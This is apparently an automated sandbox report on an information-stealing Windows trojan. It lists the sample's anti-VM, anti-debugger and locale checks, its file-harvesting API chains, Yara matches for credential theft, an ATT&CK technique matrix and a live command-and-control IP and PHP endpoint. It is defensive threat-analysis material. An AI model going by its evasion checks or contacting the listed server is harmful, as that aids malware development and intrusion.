                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-28979
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeEvaded block: after key decisiongraph_0-30140
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI coverage: 6.5 %
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02313B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02313B17
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02314B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02314B77
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0230E077
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0230C0D7
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02301937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02301937
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0230F917
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02314107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02314107
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0230E697
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0230EF87
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_023147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_023147D7
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0230DCE7
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware(
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI call chain: ExitProcess graph end nodegraph_0-28977
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI call chain: ExitProcess graph end nodegraph_0-28964
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI call chain: ExitProcess graph end nodegraph_0-28967
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI call chain: ExitProcess graph end nodegraph_0-30399
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI call chain: ExitProcess graph end nodegraph_0-28986
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI call chain: ExitProcess graph end nodegraph_0-29007
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI call chain: ExitProcess graph end nodegraph_0-28806
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeAPI call chain: ExitProcess graph end nodegraph_0-28852
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_007F1171 push dword ptr fs:[00000030h]0_2_007F1171
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0230092B mov eax, dword ptr fs:[00000030h]0_2_0230092B
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_023199B7 mov eax, dword ptr fs:[00000030h]0_2_023199B7
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02300D90 mov eax, dword ptr fs:[00000030h]0_2_02300D90
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0231D151 SetUnhandledExceptionFilter,0_2_0231D151
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0231AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0231AFAF
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_0231B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0231B5A1
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: is65NMeWkV.exe PID: 8, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_02319867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_02319867
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_02317DF7
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\is65NMeWkV.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.is65NMeWkV.exe.2300e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.is65NMeWkV.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.is65NMeWkV.exe.2350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.is65NMeWkV.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.is65NMeWkV.exe.2350000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.is65NMeWkV.exe.2300e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: is65NMeWkV.exe PID: 8, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.is65NMeWkV.exe.2300e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.is65NMeWkV.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.is65NMeWkV.exe.2350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.is65NMeWkV.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.is65NMeWkV.exe.2350000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.is65NMeWkV.exe.2300e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: is65NMeWkV.exe PID: 8, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      2
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory31
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      is65NMeWkV.exe100%AviraHEUR/AGEN.1306978
                      is65NMeWkV.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://109.107.157.208/49aaa1bd4c594849.phptrue
                        unknown
                        http://109.107.157.208/true
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://109.107.157.208/49aaa1bd4c594849.php/is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://upx.sf.netAmcache.hve.3.drfalse
                            • URL Reputation: safe
                            unknown
                            http://109.107.157.208is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              http://109.107.157.208/49aaa1bd4c594849.php(Kis65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://109.107.157.208/wsis65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://109.107.157.208/49aaa1bd4c594849.phplKis65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    109.107.157.208
                                    unknownunknown
                                    29314VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPLtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1541240
                                    Start date and time:2024-10-24 15:56:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:is65NMeWkV.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:5d0d37171e8ed9fc0b97e8f858133802.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@2/5@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 23
                                    • Number of non-executed functions: 169
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.182.143.212
